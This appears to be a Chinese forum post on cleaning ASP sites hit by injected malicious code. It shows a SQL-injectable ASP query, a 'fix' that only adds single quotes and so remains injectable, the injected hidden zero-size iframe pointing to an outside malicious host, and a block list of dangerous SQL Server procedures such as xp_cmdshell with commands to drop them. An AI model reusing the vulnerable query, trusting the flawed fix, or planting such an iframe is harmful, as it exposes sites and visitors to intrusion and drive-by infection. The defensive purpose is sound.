ASP網頁被插r入惡意代碼問題
這問題我遇見過。也在這里發(fā)過求救,最后總結是:
這總情況沒有什么軟件可以幫你修復,必須靠自己一個文件一個文件的是檢查,看是不是程序上有漏動,決大多數是程序有漏動。
比如: 在ASP里有這個一段話,
<%
ID=request("ID")
rs.open "select * from tmptabel where id=" & ID
%>
以上這句話非常容易成為入侵者下手的地方,必須加固一下
<%
ID=request("ID") 要設法檢查這個值,如不是數值就停用它,
rs.open "select * from tmptabel where id='" & ID & "'" 把這個值有單引號括上
%>
在檢查過所有文件確定程序里沒有這類SQL寫法的漏洞后。接下來就要全部替換掉所有頁面里的非法插入的<script type="text/javascript" src=">
<iframe src=http://www1.89382.cn/51.htm width=0 height=0></iframe>
這個東東,(可以用Macromedia Dreamweaver這類軟件對網站文件進行檢查),或將內部的網站把
最后是屏閉掉SQL的一個危險存儲過程,如:
/*********************************************************************
以下列出的都是危險的內置存儲過程,全在我們封殺之列
xp_cmdshell
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
Xp_regwrite
sp_OAcreate
sp_OADestroy
sp_OAMethod
sp_OAGetProperty
sp_OASetProperty
sp_OAGetErrorInfo
sp_OAStop
sp_makewebtask
/*********************************************************************
以下為屏蔽上面所說的危險內置存儲過程
sp_dropextendedproc 'xp_cmdshell'
go
sp_dropextendedproc 'xp_regaddmultistring'
go
sp_dropextendedproc 'xp_regdeletekey'
go
sp_dropextendedproc 'xp_regdeletevalue'
go
sp_dropextendedproc 'xp_regenumkeys'
go
sp_dropextendedproc 'xp_regenumvalues'
go
sp_dropextendedproc 'xp_regread'
go
sp_dropextendedproc 'xp_regremovemultistring'
go
sp_dropextendedproc 'xp_regwrite'
go
sp_dropextendedproc 'sp_OACreate'
go
sp_dropextendedproc 'sp_OADestroy'
go
sp_dropextendedproc 'sp_OAMethod'
go
sp_dropextendedproc 'sp_OAGetProperty'
go
sp_dropextendedproc 'sp_OASetProperty'
go
sp_dropextendedproc 'sp_OAGetErrorInfo'
go
sp_dropextendedproc 'sp_OAStop'
go
drop procedure sp_makewebtask
- 前一篇:中國排名前 25 位的虛擬主機商
- 后一篇:什么是電子郵件地址?